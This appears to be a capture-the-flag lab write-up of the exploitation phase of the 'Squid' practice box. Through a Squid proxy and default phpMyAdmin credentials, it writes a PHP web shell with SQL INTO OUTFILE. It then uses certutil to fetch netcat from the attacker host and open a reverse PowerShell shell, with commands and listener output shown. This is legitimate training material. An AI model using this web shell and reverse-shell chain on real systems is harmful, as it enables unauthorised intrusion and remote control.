phpMyAdmin
Leveraging the Squid HTTP Proxy instance, I was able to discover a WampServer instance running on the internal port 8080, which features various software that comes by default, including phpMyAdmin that has a default credential. Given SQL query can be executed directly from the web GUI of the target phpMyAdmin instance with the highest privileges as the root account, I can get code execution on the target system by writing a malicious PHP file to an accessible location.
/Practice/Squid/3-Exploitation/attachments/{A81AC0F5-28B5-4DD9-8815-887E1201C715}.png)
SELECT '<?php echo system($_GET["cmd"]); ?>' INTO OUTFILE 'C:\\wamp\\www\\webshell.php'Writing a webshell to the accessible location.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ curl -x http://$IP:3128 -s http://$IP:8080/webshell.php?cmd=whoami
nt authority\local serviceCode execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ cmd=$(echo 'mkdir C:\\tmp && certutil.exe -urlcache -split -f http://192.168.45.157/nc64.exe C:\\tmp\\nc64.exe && C:\\tmp\\nc64.exe 192.168.45.157 9999 -e powershell' | urlencode) ; curl -x http://$IP:3128 -s http://$IP:8080/webshell.php?cmd=$cmdDownloading the Netcat binary and calling it
/Practice/Squid/3-Exploitation/attachments/{130AD9E4-70C3-4A8A-8CAA-F729A4D4C220}.png)
Hit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 49775
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\wamp\www> whoami
whoami
nt authority\local service
PS C:\wamp\www> hostname
hostname
SQUID
PS C:\wamp\www> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.135.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254Initial Foothold established to the target system as the local service account via exploiting the target phpMyAdmin instance